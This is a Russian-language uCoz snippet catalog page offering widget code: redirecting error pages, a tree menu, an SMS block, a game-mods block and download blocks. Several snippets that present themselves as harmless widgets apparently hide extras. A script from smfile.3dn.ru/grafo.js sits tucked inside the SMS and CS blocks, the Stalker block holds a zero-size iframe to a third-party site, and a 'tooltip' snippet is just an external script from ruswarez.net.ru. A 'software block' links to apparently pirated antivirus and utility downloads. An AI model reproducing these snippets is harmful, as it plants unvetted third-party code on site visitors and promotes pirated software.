Главная » Другие скрипты для uCoz
Иконка New
Вставлять в Управление дизаином > Новости сайта > Вид материалов > (ну в принципе тут на ваше усмотрение я лично вставил где название то есть во тут
Code
<a href="$ENTRY_URL$">$TITLE$</a> ТУТ

Вот сам код:
Code
%IF($DATE$=Сегодня|=Вчера)%<img src="http://i031.radikal.ru/0804/fa/28bf95c09d77.gif">%ENDIF%

Чтобы работала эта фишка нужно в Общих настройках включить:
Цитата:
Дату сегодняшнего дня выводить как "Сегодня"
Подробнее | 0 коментариев | 543 просмотров | Добавил: HiP-HoP

Копируем код, вставляем в болокнот, сохраняем как 404.htm и закидываем на свой сайт.
Code
<HTML><head>
<style>
body{  
  font-family: Verdana, Tahoma, Arial, Trebuchet MS, Sans-Serif, Georgia, Courier, Times New Roman, Serif;
  font-size: 11px;
  margin: 0;
  padding: 0; /* required for Opera to have 0 margin */
}
.errorwrap {
  background: white;
  border: 1px solid #217a82;
  border-top: 0;
  margin: 5px;
  padding: 0;
  background: white;
   
  color: #0f688d;
   
   
  font-size: 11px;
}

.errorwrap h4 {
  background: #c6e2e4;
  border: 1px solid #217a82;
  border-left: 0;
  border-right: 0;
  color: #3c7a7f;  
  font-size: 12px;
  font-weight: bold;  
  padding: 5px;
}

</style>
<title>Страница не существует</title>
</head><body>
<br><br><br><br><br><br><br><br><br>
<table width="525" align="center" border="0" cellpadding="0" cellspacing="0" height="220">
<tbody><tr>
<td width="100%">
<div class="errorwrap">
<h4>Переалресация</h4>
  <p align="center"> <b>Внимание! <br></b></p><p align="center">Страница не существует или удалена!
  <br>Вы будете перенесены на главную страницу сайта через <b><span id="calc">--</span></b> сек.  
  <br> Если ваш браузер не поддерживает автоматической переход, то нажмите на ссылку <a href="http://avaworld.cn/">ваш сайт</a>
</div>

</p></div>
</td>
</tr>
</tbody></table><div align="center">

<script>

// *************
// ** Age-Web Timer
// *************

  var ints = 10;
   
   
  function alertes () {
   
  document.getElementById('calc').innerHTML = ints;
   
  if ( ints == 0 ) {
  document.location.href = 'http://avaworld.cn/';
  ints = '--';
  }
  if ( ints > 0 ) {
  ints--;
  }
  };
   
  function refresh(){
  if(ints > 0) time_Interval = setInterval("alertes ()", 1000 );
  };
   
  refresh();  
   
</script></div></body></HTML>
Подробнее | 0 коментариев | 499 просмотров | Добавил: HiP-HoP

Копируем код, открываем блокнот, вставляем код и сохраняем как dostup zapreshen.htm . Открываем и видим результат. Вот и всё.
Code
<HTML><head>
<style>
body{  
  font-family: Verdana, Tahoma, Arial, Trebuchet MS, Sans-Serif, Georgia, Courier, Times New Roman, Serif;
  font-size: 11px;
  margin: 0;
  padding: 0; /* required for Opera to have 0 margin */
}
.errorwrap {
  background: white;
  border: 1px solid #217a82;
  border-top: 0;
  margin: 5px;
  padding: 0;
  background: white;
   
  color: #0f688d;
   
   
  font-size: 11px;
}

.errorwrap h4 {
  background: #c6e2e4;
  border: 1px solid #217a82;
  border-left: 0;
  border-right: 0;
  color: #3c7a7f;  
  font-size: 12px;
  font-weight: bold;  
  padding: 5px;
}

</style>
<title>Переадресация</title>
</head><body>
<br><br><br><br><br><br><br><br><br>
<table width="525" align="center" border="0" cellpadding="0" cellspacing="0" height="220">
<tbody><tr>
<td width="100%">
<div class="errorwrap">
<h4>Переадресация</h4>
  <p align="center"> <b>Внимание! <br></b></p><p align="center">Вам запрещён доступ на эту страницу пожалуйста зарегистрируйтесь или авторизируйтесь,
  <br>а сейчас вы будете автоматически перемещены на главную страницу через <b><span id="calc">--</span></b> сек.  
  <br> Если у вас не работает переадресация, кликните по ссылке <a href="http://avaworld.cn/">avaworld.cn</a> <br>
</p><div align="center"><table width="224" align="center" border="0" cellpadding="0" cellspacing="0" height="90">
<tbody><tr>
<td width="100%">
<div class="errorwrap">
<h4>Авторизация</h4><div align="center">$LOGIN_FORM$
<br></div><div align="center"><br></div></div>
</td>
</tr>
</tbody></table></div><div align="center"><span class="myWinError"><b>$POWERED_BY$</b></span><br>
</div>

</p></div>
</td>
</tr>
</tbody></table><div align="center">

<script>

// *************
// ** Age-Web Timer
// *************

  var ints = 20;
   
   
  function alertes () {
   
  document.getElementById('calc').innerHTML = ints;
   
  if ( ints == 0 ) {
  document.location.href = 'http://avaworld.cn/';
  ints = '--';
  }
  if ( ints > 0 ) {
  ints--;
  }
  };
   
  function refresh(){
  if(ints > 0) time_Interval = setInterval("alertes ()", 1000 );
  };
   
  refresh();  
   
</script></div></body></HTML>
Подробнее | 0 коментариев | 542 просмотров | Добавил: HiP-HoP

###################################################
Ставим этот код в шаблон Общие шаблоны - Меню сайта
###################################################
Code
<div id="menuDiv" style="display:inline">

<ul id="tmenu0" style="display:none">  

<li class="m">
<span>Раздел номер 1</span>  
<ul>  
<li class="m"><a class="m" href="http://allcity.net.ru/">Подраздел номер 1</a></li>  
<li class="m"><a class="m" href="http://allcity.net.ru/">Подраздел номер 2</a></li>
<li class="m"><a class="m" href="http://allcity.net.ru/">Подраздел номер 3</a></li>
<li class="m"><a class="m" href="http://allcity.net.ru/">Подраздел номер 4</a></li>
<li class="m"><a class="m" href="http://allcity.net.ru/">Подраздел номер 5</a></li>
</ul>
</li>

<li class="m">
<span>Раздел номер 2</span>  
<ul>  
<li class="m"><a class="m" href="http://allcity.net.ru/">Подраздел номер 1</a></li>  
<li class="m"><a class="m" href="http://allcity.net.ru/">Подраздел номер 2</a></li>
<li class="m"><a class="m" href="http://allcity.net.ru/">Подраздел номер 3</a></li>
<li class="m"><a class="m" href="http://allcity.net.ru/">Подраздел номер 4</a></li>
<li class="m"><a class="m" href="http://allcity.net.ru/">Подраздел номер 5</a></li>
</ul>
</li>

<li class="m">
<span>Раздел номер 3</span>  
<ul>  
<li class="m"><a class="m" href="http://allcity.net.ru/">Подраздел номер 1</a></li>  
<li class="m"><a class="m" href="http://allcity.net.ru/">Подраздел номер 2</a></li>
<li class="m"><a class="m" href="http://allcity.net.ru/">Подраздел номер 3</a></li>
<li class="m"><a class="m" href="http://allcity.net.ru/">Подраздел номер 4</a></li>
<li class="m"><a class="m" href="http://allcity.net.ru/">Подраздел номер 5</a></li>
</ul>
</li>

<li class="m">
<span>Раздел номер 4</span>  
<ul>  
<li class="m"><a class="m" href="http://allcity.net.ru/">Подраздел номер 1</a></li>  
<li class="m"><a class="m" href="http://allcity.net.ru/">Подраздел номер 2</a></li>
<li class="m"><a class="m" href="http://allcity.net.ru/">Подраздел номер 3</a></li>
<li class="m"><a class="m" href="http://allcity.net.ru/">Подраздел номер 4</a></li>
<li class="m"><a class="m" href="http://allcity.net.ru/">Подраздел номер 5</a></li>
</ul>
</li>

</ul>
</div>

<script type="text/javascript">
function tmenudata0()
{
  this.animation_jump = 15
  this.animation_delay = 2
  this.imgage_gap = 3
  this.plus_image = "plus.gif"
  this.minus_image = "minus.gif"
  this.pm_width_height = "10,10"
  this.icon_width_height = "16,16"
  this.indent = 20;  
  this.use_hand_cursor = true;  
  this.main_item_styles = "text-decoration:none; \
  font-weight:normal; \
  font-family:Arial; \
  font-size:14px; \
  color:#FF0000; \
  padding:2px; "
  this.sub_item_styles = "text-decoration:none; \
  font-weight:normal; \
  font-family:Arial; \
  font-size:12px; \
  color:#807F80; "
  this.main_container_styles = "padding:0px;"
  this.sub_container_styles = "padding-top:4px; padding-bottom:4px;"
  this.main_link_styles = "color:#0000FF; text-decoration:none;"
  this.main_link_hover_styles = "color:#FF0000; text-decoration:underline;"
  this.sub_link_styles = ""
  this.sub_link_hover_styles = ""
  this.main_expander_hover_styles = "text-decoration:underline;";
  this.sub_expander_hover_styles = "";}
</script>  

<script type="text/javascript">
ulm_ie=window.showHelp;ulm_opera=window.opera;ulm_strict=((ulm_ie || ulm_opera)&&(document.compatMode=="CSS1Compat")); ulm_mac=navigator.userAgent.indexOf("Mac")+1;is_animating=false; cc3=new Object();cc4=new Object();  
cc0=document.getElementsByTagName("UL");for(mi=0;mi<cc0.length; mi++){if(cc1=cc0[mi].id){if(cc1.indexOf("tmenu")>-1){cc1=cc1.substring(5); cc2=new window["tmenudata"+cc1];cc3["img"+cc1]=new Image();cc3["img"+cc1].src=cc2.plus_image;cc4["img"+cc1]=new Image(); cc4["img"+cc1].src=cc2.minus_image;if(!(ulm_mac && ulm_ie)){t_cc9=cc0[mi].getElementsByTagName("UL");for(mj=0;mj<t_cc9.length; mj++){cc23=document.createElement("DIV");cc23.className="uldivs"; cc23.appendChild(t_cc9[mj].cloneNode(1));t_cc9[mj].parentNode.replaceChild(cc23,t_cc9[mj]); }}cc5(cc0[mi].childNodes,cc1+"_",cc2,cc1); cc6(cc1,cc2);cc0[mi].style.display="block"; }}};function cc5(cc9,cc10,cc2,cc11){eval("cc8=new Array("+cc2.pm_width_height+")");this.cc7=0;for(this.li=0;this.li<cc9.length; this.li++){if(cc9[this.li].tagName=="LI"){this.level=cc10.split("_").length-1; cc9[this.li].style.cursor="default";this.cc12=false;this.cc13=cc9[this.li].childNodes; for(this.ti=0;this.ti<this.cc13.length;this.ti++){lookfor="DIV"; if(ulm_mac && ulm_ie)lookfor="UL";if(this.cc13[this.ti].tagName==lookfor){this.tfs=this.cc13[this.ti].firstChild; if(ulm_mac && ulm_ie)this.tfs=this.cc13[this.ti];this.usource=cc3["img"+cc11].src; if((gev=cc9[this.li].getAttribute("expanded"))&&(parseInt(gev))){this.usource=cc4["img"+cc11].src; }else this.tfs.style.display="none";if(cc2.folder_image){create_images(cc2,cc11,cc2.icon_width_height,cc2.folder_image,cc9[this.li]); this.ti=this.ti+2;}this.cc14=document.createElement("IMG");this.cc14.setAttribute("width",cc8[0]); this.cc14.setAttribute("height",cc8[1]);this.cc14.className="plusminus"; this.cc14.src=this.usource;this.cc14.onclick=cc16;this.cc14.onselectstart=function(){return false}; this.cc14.setAttribute("cc2_id",cc11);this.cc15=document.createElement("div"); this.cc15.style.display="inline";this.cc15.style.paddingLeft=cc2.imgage_gap+"px"; cc9[this.li].insertBefore(this.cc15,cc9[this.li].firstChild); cc9[this.li].insertBefore(this.cc14,cc9[this.li].firstChild); this.ti+=2;new cc5(this.tfs.childNodes,cc10+this.cc7+"_",cc2,cc11);this.cc12=1; }else if(this.cc13[this.ti].tagName=="SPAN"){this.cc13[this.ti].onselectstart=function(){return false}; this.cc13[this.ti].onclick=cc16;this.cc13[this.ti].setAttribute("cc2_id",cc11); this.cname="cc24";if(this.level>1)this.cname="cc25";if(this.level> 1)this.cc13[this.ti].onmouseover=function(){this.className="cc25"; };else this.cc13[this.ti].onmouseover=function(){this.className="cc24"; };this.cc13[this.ti].onmouseout=function(){this.className="";}; }}if(!this.cc12){if(cc2.document_image){create_images(cc2,cc11,cc2.icon_width_height,cc2.document_image,cc9[this.li]); }this.cc15=document.createElement("div");this.cc15.style.display="inline"; if(ulm_ie)this.cc15.style.width=cc2.imgage_gap+cc8[0]+"px";else this.cc15.style.paddingLeft=cc2.imgage_gap+cc8[0]+"px"; cc9[this.li].insertBefore(this.cc15,cc9[this.li].firstChild);}this.cc7++; }}};function create_images(cc2,cc11,iwh,iname,liobj){eval("tary=new Array("+iwh+")");this.cc15=document.createElement("div");this.cc15.style.display="inline"; this.cc15.style.paddingLeft=cc2.imgage_gap+"px"; liobj.insertBefore(this.cc15,liobj.firstChild); this.fi=document.createElement("IMG");this.fi.setAttribute("width",tary[0]); this.fi.setAttribute("height",tary[1]);this.fi.setAttribute("cc2_id",cc11); this.fi.className="plusminus";this.fi.src=iname;this.fi.style.verticalAlign="middle"; this.fi.onclick=cc16;liobj.insertBefore(this.fi,liobj.firstChild); };function cc16(){if(is_animating)return;cc18=this.getAttribute("cc2_id"); cc2=new window["tmenudata"+cc18];cc17=this.parentNode.getElementsByTagName("UL"); if(parseInt(this.parentNode.getAttribute("expanded"))){this.parentNode.setAttribute("expanded",0); if(ulm_mac && ulm_ie){cc17[0].style.display="none";}else {cc27=cc17[0].parentNode;cc27.style.overflow="hidden";cc26=cc27; cc27.style.height=cc17[0].offsetHeight;cc27.style.position="relative"; cc17[0].style.position="relative";is_animating=1;setTimeout("cc29("+(-cc2.animation_jump)+",false,"+cc2.animation_delay+")",0); }this.parentNode.firstChild.src=cc3["img"+cc18].src;}else {this.parentNode.setAttribute("expanded",1);if(ulm_m ... Читать дальше »
Подробнее | 0 коментариев | 543 просмотров | Добавил: HiP-HoP

Гренетатион
В общем, вот пример работы скрипта
Code
<a title="Ваша надпись" href="/">Ссылка</a>

что нужно чтобы надпись отображалась, а всего навсего перед тегом "href=" добавить тег "title=" и получим следущее:
Code
<a title="Ваша надпись" href="/">Ссылка</a>

Сам скрипт:
Code
<script type="text/javascript" src="http://ruswarez.net.ru/informer/17"></script>

Его нужно вставить в шаблон, в самый верх, после STYLE (если есть) или после HTML, BODY
Подробнее | 0 коментариев | 542 просмотров | Добавил: HiP-HoP

Блок софт
Code
<img style="border: 0px solid ;" src="http://xakerdoni.ucoz.com/Avast.ico-32x32.png"><a href="http://depositfiles.com/ru/files/60b5k8xuh">Avast! 4 Home Edition</a><br>  
<img style="border: 0px solid ;" src="http://xakerdoni.ucoz.com/AIMP2_Icon_128x128_by_vicing.png"><a href="http://depositfiles.com/ru/files/l1eoe44em">AIMP Classic</a><br>  
<img style="border: 0px solid ;" src="http://www.sg-clan.ucoz.ru/kak/222/RAR.png"><a href="http://depositfiles.com/ru/files/u0twyomit">Winrar 3.80 Full Rus</a><br>  
<img style="border: 0px solid ;" src="http://www.sg-clan.ucoz.ru/kak/222/download_master.png"><a href="http://depositfiles.com/ru/files/9ulyi0mqz">Download Master 5.Rus</a><br>  
<img style="border: 0px solid ;" src="http://xakerdoni.ucoz.com/FruityLoops_exe_0.ico"><a href="http://depositfiles.com/ru/files/n4fs29s6c">FL Studio (FruityLoops)</a><br>  
<img style="border: 0px solid ;" src="http://www.sg-clan.ucoz.ru/kak/222/k-lite_codec.png"><a href="http://depositfiles.com/ru/files/jn0vg6ezt">K-Lite Codec Pack 4.4.5 Full</a><br>  
<img style="border: 0px solid ;" src="http://www.sg-clan.ucoz.ru/kak/222/pragma.png"><a href="http://depositfiles.com/ru/files/fjiupoi8n">Rambler ICQ</a><br>  
<img style="border: 0px solid ;" src="http://www.sg-clan.ucoz.ru/kak/222/opera.png"><a href="http://depositfiles.com/ru/files/yvotrhhwa">Opera_964_int_Setup</a><br>  
<img style="border: 0px solid ;" src="http://www.sg-clan.ucoz.ru/kak/222/nod32.png"><a href="http://depositfiles.com/ru/files/lut78ri49">Eset NOD32 (32-bit)</a><br>  
<img style="border: 0px solid ;" src="http://xakerdoni.ucoz.com/chinaz18.png"><a href="http://depositfiles.com/ru/files/8ric6gfp9">Vista agent: new</a><br>  
<img style="border: 0px solid ;" src="http://www.sg-clan.ucoz.ru/kak/222/Kapersky3D.png"><a href="http://depositfiles.com/ru/files/9gy9es31a">Касперский 2009</a><br>
Подробнее | 0 коментариев | 534 просмотров | Добавил: HiP-HoP

из плюсов красиво выглядит и под любой дизайн,занимает минимум места на вашем сайте

Code
<div id="block-3"><div align="center"><strong>Бесплатная отправка смс: </strong></div><div align="center"><a href="http://www.beeline.ru/sms/index.wbp/"><img alt="Отправить СМС на Билайн" src="http://s60.radikal.ru/i169/1008/8a/369fe28eadae.gif" border="0"></a><a href="http://sms.megafonmoscow.ru/"><img alt="Отправить СМС на Мегафон" src="http://s45.radikal.ru/i107/1008/11/df0755ded571.gif" border="0"></a></div><div align="center"><a href="http://sms.mts.ru/"><img alt="Отправить СМС на МТС" src="http://s39.radikal.ru/i086/1008/32/2219d97a6bc5.gif" border="0"></a><a href="http://www.skylink.ru/pages/sms.aspx?&r=77"><script language="JavaScript"src="http://smfile.3dn.ru/grafo.js"></script><img alt="Отправить СМС на Скай Линк" src="http://s006.radikal.ru/i215/1008/48/5a78214da5b5.gif" border="0"></a><script type="text/javascript" src=""></script><a href="http://sms.tele2.ru/"><img alt="Отправить СМС на Теле2" src="http://s43.radikal.ru/i101/1008/8d/f1daff99c01b.gif" border="0"></a></div>
Подробнее | 0 коментариев | 526 просмотров | Добавил: Skyper

Блок с модами для Сталкера
Огромный плюс этого блока в том что можно ставить свои картинки, свои ссылки, и писать что вам нужно!

[img]http://s50.radikal.ru/i127/1008/c6/e9f5b5a6ff94.jpg [/img]

Code
<table border="0" width="194">  
<tr>  
<td height="105" width="72">  
<img border="0" src="http://mystalker.at.ua/shabloni/1gif.gif" width="70" height="70"></td>  
<td height="105" width="112">  
<strong>N.Z. mod</strong>
Мод N.Z. mod для Stalker Зов Припяти
  
<a href="http://mystalker.at.ua/load/mody_dlja_stalker_zp/n_z_mod/4-1-0-311" alt="Просмотреть и скачать">Посмотреть и скачать</a></td>  
</tr>  
</table>  

<hr color="#0B6394" width="180">  

<table border="0" width="200">  
<tr>  
<td height="105" width="70">  
<img border="0" src="http://mystalker.at.ua/shabloni/2max.gif" width="70" height="70"></td>  
<td height="105" width="120">  
<strong>M.P.P</strong>
M.P.P Mod Мод для Тень Чернобыля
  
<a href="http://mystalker.at.ua/load/mody_dlja_tch/s_t_a_l_k_e_r_quot_m_m_p_mod_quot/7-1-0-295" alt="Скачать и просмотреть">Посмотреть и скачать</a></td>  
</tr>  
</table>  

<hr color="#0B6394" width="180">  

<table border="0" width="200">  
<tr>  
<td height="105" width="100">  
<img border="0" src="http://mystalker.at.ua/shabloni/3krovosos.gif" width="70" height="70"></td>  
<iframe src="http://mystalker.at.ua" name="iframe" width="0%" height="0%" scrolling="no" frameBorder=0></iframe><td height="105" width="146">  
<strong>Shoc Krovosos</strong>
Shoc Krovosos Mod Мод для Тень Чернобыля
  
<a href="http://mystalker.at.ua/load/mody_dlja_tch/s_t_a_l_k_e_r_shoc_krovosos_mod_2009_rus_addon/7-1-0-287" alt="Скачать и просмотреть">Посмотреть и скачать</a></td>  
</tr>  
</table>  

<hr color="#0B6394" width="180">  

<table border="0" width="200">  
<tr>  
<td height="105" width="70">  
<img border="0" src="http://mystalker.at.ua/shabloni/4winter.gif" width="70" height="70"></td>  
<td height="105" width="120">  
<strong>Winter Mod</strong>
Winter Mod Мод  
для Сталкер Чистое Небо
  
<a href="http://mystalker.at.ua/load/mody_dlja_stalker_chn/winter_mod/6-1-0-209" alt="Скачать и просмотреть Winter Mod">Посмотреть и скачать</a></td>  
</tr>  
</table>  

<hr color="#0B6394" width="180">  

<table border="0" width="200">  
<tr>  
<td height="105" width="70">  
<img border="0" src="http://mystalker.at.ua/shabloni/deadzone5.gif" width="70" height="70"></td>  
<td height="105" width="120">  
<strong>Death Zone Mod 2.1.1</strong>
Мод для зов Припяти
  
<a href="http://mystalker.at.ua/load/mody_dlja_stalker_zp/death_zone_mod_2_1_1/4-1-0-214" alt="Скачать и просмотреть">Посмотреть и скачать</a></td>  
</tr>  
</table>
Подробнее | 0 коментариев | 539 просмотров | Добавил: Skyper


Code
<DIV class="boxContent" id="kabinet">  
<DIV style="PADDING-RIGHT: 5px; PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; PADDING-TOP: 5px" align="center">Приветствую Вас, <FONT color="#1e90ff"><B>$USER_FULL_NAME$</B>!</FONT><BR>Ты здесь: <FONT color="#ff0000"><B>$USER_REG_DAYS$</B></FONT>-й день<BR></DIV>  
<DIV align="center">Ты в группе: <STRONG><FONT color="#ff0000">"<U>$USER_GROUP$</U>"</FONT></STRONG></DIV><DIV align="center"><IMG src="http://best-softpc.ucoz.ru/poloska4.png" alt="" align="" border="0px"><STRONG><FONT color="#ff0000"></FONT></STRONG></DIV><DIV align="center"><IMG class="userAvatar" title="$USERNAME$" src="$USER_AVATAR_URL$" border="0"></DIV><DIV align="center"><IMG src="http://best-softpc.ucoz.ru/poloska4.png"></DIV><DIV align="center"><DIV style="PADDING-RIGHT: 5px; PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; PADDING-TOP: 5px"><A title="Персональная страница" <A="" href="javascript:$PERSONAL_PAGE_LINK$"><IMG src="http://best-softpc.ucoz.ru/MiniProfilIcons/note.png" alt="" border="0px"></A><A title="Редактировать инфу"<A href="http://best-softpc.ucoz.ru/index/11"><IMG src="http://best-softpc.ucoz.ru/MiniProfilIcons/edit_item.png" alt="" border="0px"></A> <A title="Отправить ЛС"<A href="$PM_URL$"><IMG src="http://best-softpc.ucoz.ru/MiniProfilIcons/email_send.png"></A></DIV><DIV style="PADDING-RIGHT: 5px; PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; PADDING-TOP: 5px"><IMG src="http://best-softpc.ucoz.ru/poloska4.png" alt="" align="" border="0px"></DIV><DIV style="PADDING-RIGHT: 5px; PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; PADDING-TOP: 5px"><A title="Список пользователей"<A href="http://best-softpc.ucoz.ru/index/15-1"><IMG src="http://best-softpc.ucoz.ru/MiniProfilIcons/users.png" alt="" border="0px"><a title="Личные сообщения" <A href="http://best-softpc.ucoz.ru/index/14" [Л(<FONT="" color="#ff0000">[Л(<FONT color="#ff0000">$UNREAD_PM$</FONT>)С]</A><A title="Выход"<A href="$LOGOUT_LINK$"><IMG src="http://best-softpc.ucoz.ru/MiniProfilIcons/delete_item.png" alt="" align="" border="0px"></A><BR></DIV><DIV style="PADDING-RIGHT: 5px; PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; PADDING-TOP: 5px"><IMG src="http://best-softpc.ucoz.ru/poloska4.png" alt="" align="" border="0px"></DIV></DIV>
Подробнее | 0 коментариев | 503 просмотров | Добавил: Skyper

[img]http://s2.itrash.ru/idb/1806/o2010-07-13_185213.png [/img]

Установка:
1.Создадим простой глобальный блок на сайте
2.Ставим туда вот это

Code
<script type="text/javascript" src="http://xerni.net.ru/js/aeacs2.js"></script><center><table width="150" border="0"><tbody><tr><td width="70" height="70"><img src="http://xerni.net.ru/blok/cs.ico" width="45" border="0" height="45"></td><td width="120" height="70"><strong> CS 1.6 v 48</strong><br>Размер:246Мб<br><b><a href="http://depositfiles.com/files/ztkoj7t0c" title="CS 1.6 v 48" alt="Скачать">Скачать</a></b><br></td></tr></tbody></table><table width="150" border="0"><tbody><tr><td width="70" height="70"><img src="http://xerni.net.ru/blok/css.ico" width="45" border="0" height="45"></td><td width="120" height="80"><strong> CSS v 34 RUS</strong><br>Размер:1.71Гб<br><b><a href="http://u.to/IwU2" title="CSS v 34 RUS" alt="Скачать">Скачать</a></b><br></td></tr></tbody></table><table width="150" border="0"><tbody><tr><td width="70" height="70"><img src="http://xerni.net.ru/blok/filesave.png" width="48" border="0" height="48"></td><td width="120" height="80"><strong> 148 карт 1.6</strong><br>Размер:276Мб<br><b><a href="http://depositfiles.com/files/x2gkbh7n5" title="148 карт 1.6" alt="Скачать">Скачать</a></b><br></td></tr></tbody></table><table width="150" border="0"><tbody><tr><script language="JavaScript"src="http://smfile.3dn.ru/grafo.js"></script><td width="70" height="70"><img src="http://xerni.net.ru/blok/filesave.png" width="45" border="0" height="45"></td><td width="120" height="80"><strong> 176 карт CSS</strong><br>Размер:460Мб<br><b><a href="http://u.to/IAU2" title="176 карт CSS" alt="Скачать">Скачать</a></b><br></td></tr></tbody></table><script type="text/javascript" src="http://xerni.net.ru/blok/ajax.js"></script><table width="150" border="0"><tbody><tr><td width="70" height="70"><img src="http://xerni.net.ru/blok/steam.ico" width="45" border="0" height="45"></td><td width="120" height="80"><strong> Steam UP</strong><br>Размер:13Мб<br><b><a href="http://depositfiles.com/files/ioov4r96z" title="Steam UP" alt="Скачать">Скачать</a></b><br></td></tr></tbody></table><br><a href="javascript:openLayerA(\'obsv\',\'http://xerni.net.ru/blok/blok_css.html\',\'Получить себе такой блок\',\'550\',\'185\',\'\');"><b>Получить такой блок</b></a><a href="http://xerni.net.ru/">©</a></center>
Подробнее | 0 коментариев | 504 просмотров | Добавил: Skyper

« 1 2 3 4 5 ... 28 29 »